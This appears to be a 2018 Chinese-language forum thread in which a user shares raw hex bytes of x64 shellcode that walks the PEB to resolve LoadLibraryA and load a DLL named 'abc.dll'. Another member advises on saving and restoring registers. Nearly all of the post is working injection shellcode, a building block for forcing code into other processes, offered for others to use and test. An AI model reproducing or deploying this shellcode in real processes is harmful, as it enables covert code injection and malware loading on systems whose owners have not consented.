X64 SHELLCODE LoalibraryA
本帖最后由 smny 于 2018-5-16 15:43 编辑50 51 52 53 55 56 57 41 50 41 51 41 52 41 53 41 54 41 55 41 56 41 57 48 9C 48 83 EC 28 65 48 8B 34 25 60 00 00 00 48 8B 76 18 48 8B 76 30 48 8B 36 48 8B 36 48 8B 6E 10 3E 8B 45 3C 8B 94 28 88 00 00 00 48 63 D2 48 03 D5 8B 4A 18 48 63 C9 8B 5A 20 48 63 DB 48 03 DD FF C9 8B 34 8B 48 63 F6 48 03 F5 48 B8 4C 6F 61 64 4C 69 62 72 48 39 06 75 E6 81 7E 08 61 72 79 41 75 DD 8B 5A 24 48 63 DB 48 03 DD 48 33 C0 66 8B 0C 4B 48 63 C1 8B 5A 1C 48 63 DB 48 03 DD 8B 0C 83 48 63 C1 48 03 C5 E8 00 00 00 00 59 48 83 C1 24 FF D0 48 83 C4 28 9D 41 5F 41 5E 41 5D 41 5C 41 5B 41 5A 41 59 41 58 5F 5E 5D 5B 5A 59 58 C3 61 62 63 64 2E 64 6C 6C 00 00
LoadlibraryA x64
Z大帅点拨了一下,重写的,求测评。X64 没有PUSHAD用了一堆 PUSH。
这么好的代码藏起来有点可惜了,分享一下。~~
这二进制要发给谁看 ... 主要问题在于你没有保存以及恢复相关暂存器,
LoadLibraryA "abc.dll" 之后会更改许多暂存器以及堆栈内容。 zenix 发表于 2018-5-16 12:05
主要问题在于你没有保存以及恢复相关暂存器,
LoadLibraryA "abc.dll" 之后会更改许多暂存器以及堆栈内容 ...
感谢Z大帅指点
页:
[1]